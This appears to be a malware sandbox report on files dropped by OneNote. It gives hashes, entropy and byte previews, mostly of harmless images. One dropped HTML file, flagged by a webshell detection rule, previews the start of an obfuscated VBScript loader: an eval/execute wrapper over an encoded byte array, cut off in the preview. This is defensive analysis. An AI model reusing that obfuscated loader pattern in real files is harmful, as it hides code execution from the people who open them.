                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):239
                                                                                                                                            Entropy (8bit):6.541057503179854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPKLMRFj+8y6aoBRQcXgTxmRZnh80Ij3Xcnup:6v/7iQE6fwTsOWc
                                                                                                                                            MD5:088833D5A4FDCD105A34657922326F76
                                                                                                                                            SHA1:2A85EAA5121E27D6AA8F9D0C9D4C50620126D04A
                                                                                                                                            SHA-256:F3148B2CF70D225A76261E270E734F55D484D9ECF00B2DBD052D52FE40BD636C
                                                                                                                                            SHA-512:B988C05CB0192EF03603D002AEAA790016768039ED3177932E5CB2BBAD988E6EBD83B2DB9D4A2F0761FDFFA49EE28C8DD4494CEA77DFAC1BFB58DC1DADFDEF91
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.Q.. ..m's7.h.d.....C..1.. ........H..s..@.t....... ....E...@..n......)*D.z.}..v..P]..J._.:Q.Ft..........,.E...."P..@.X.'..`f.....e3/..]'$..qK7.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1312x424, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):54127
                                                                                                                                            Entropy (8bit):7.804118984558617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4uWStwiFAImRuCERn9FCD7OTseOMUX7we1WHzjKALnTCCCCCCCCCCCCCCCCCCCCp:4uWt4AJERnyNenUWHCoTCCCCCCCCCCCm
                                                                                                                                            MD5:2CCB7FD40E61B6DD2CD936E61929FB81
                                                                                                                                            SHA1:B10AC2D16273A785C6B73E4CE047716CB451BE1C
                                                                                                                                            SHA-256:CBF4835796C6C58C2EEBB12BFE73AAAE73D0E9F37C5BD5DC63092ED776485FE8
                                                                                                                                            SHA-512:A83BFF1E484CAB88E97B72083A1E232A87856253928C1434F48C904343845AFEC8D2B1084E0BEF102C46413A34F9D8D1CB25A280FD968FF19927E17601326946
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (18859), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23607
                                                                                                                                            Entropy (8bit):4.399875668688412
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:0ttRtO74aTReR26QLaZnwd7T9YLejbMqQU4R+GWXeRRjH7s/vNousrM277sLyore:0v7xS+6r2ZiNe7Foel6nG
                                                                                                                                            MD5:7146557E5F41764249375BC3F78D1940
                                                                                                                                            SHA1:9C6AD74C4E2C4DC1E5A27164A399F81D06710D1D
                                                                                                                                            SHA-256:787D8B615BD835EAE99904E031B35645D8898909E4AAB512AF64171841F8033B
                                                                                                                                            SHA-512:E56C196E66B5A19518591189EA682AC5F84ACACC47DF9B759EDE5559F9BB8F5FBB86955D23FE16D08225526F867D05C135B3E7BFD9EEECFE203BB4BBE820D891
                                                                                                                                            Malicious:false
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin, Author: Arnim Rupp
                                                                                                                                            Preview:<html><head><script language="vbscript">..Sub VnnTDIHERQAuvaRpjX(OoApSvEoSGyffAOvR) : eval("execute(OoApSvEoSGyffAOvR)") : End Sub..xzUpxubNpiSVvciVOyyKliJJ = array(211, 232, 133, 172, 224, 191, 177, 194, 122, 215, 179, 235, 186, 182, 191, 149, 209, 213, 199, 227, 89, 121, 139, 187, 180, 133, 183, 185, 151, 136, 130, 106, 161, 200, 189, 130, 187, 167, 198, 136, 161, 116, 144, 196, 175, 175, 204, 191, 159, 217, 207, 184, 213, 224, 120, 108, 166, 204, 230, 174, 224, 226, 212, 188, 212, 151, 155, 179, 211, 199, 181, 239, 184, 220, 167, 224, 146, 178, 184, 188, 171, 236, 118, 162, 128, 132, 163, 213, 145, 168, 182, 210, 144, 140, 231, 198, 171, 223, 198, 175, 222, 218, 237, 225, 220, 137, 111, 170, 171, 177, 149, 229, 219, 192, 190, 207, 197, 176, 180, 194, 203, 173, 165, 205, 188, 228, 208, 212, 178, 205, 193, 165, 175, 190, 195, 179, 230, 189, 205, 115, 142, 137, 182, 188, 173, 213, 142, 184, 139, 128, 154, 176, 170, 185, 147, 166, 135, 109, 103, 128, 154, 176, 219, 111, 227, 220, 150, 1

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000056.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000057.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000058.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):296
                                                                                                                                            Entropy (8bit):6.844511427678902
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPfRF/9916DoPg9nF9mWydqygHn5+QCEcve0AHJks+Qoi36r4up:6v/7BXfrPqTmWyduCE6Iks+biw4c
                                                                                                                                            MD5:33DCA72504D567C57F95452A0358ED2F
                                                                                                                                            SHA1:F97C8896E03EF1C3CC4CD97E263F86C85FC80C31
                                                                                                                                            SHA-256:7E131D7DD2D98E5BF76866FFE0EB5C0AC994E1E791B07F61FB3A756F24D7317C
                                                                                                                                            SHA-512:64E48397171372908B9A5C1459DABE7C41E175CA7A27A064DBE45B747FC0973C6A77DCD77993403D19AAEBC5A92E944382FC3A34C58D5A893510576B2BA453A0
                                                                                                                                            Malicious:false
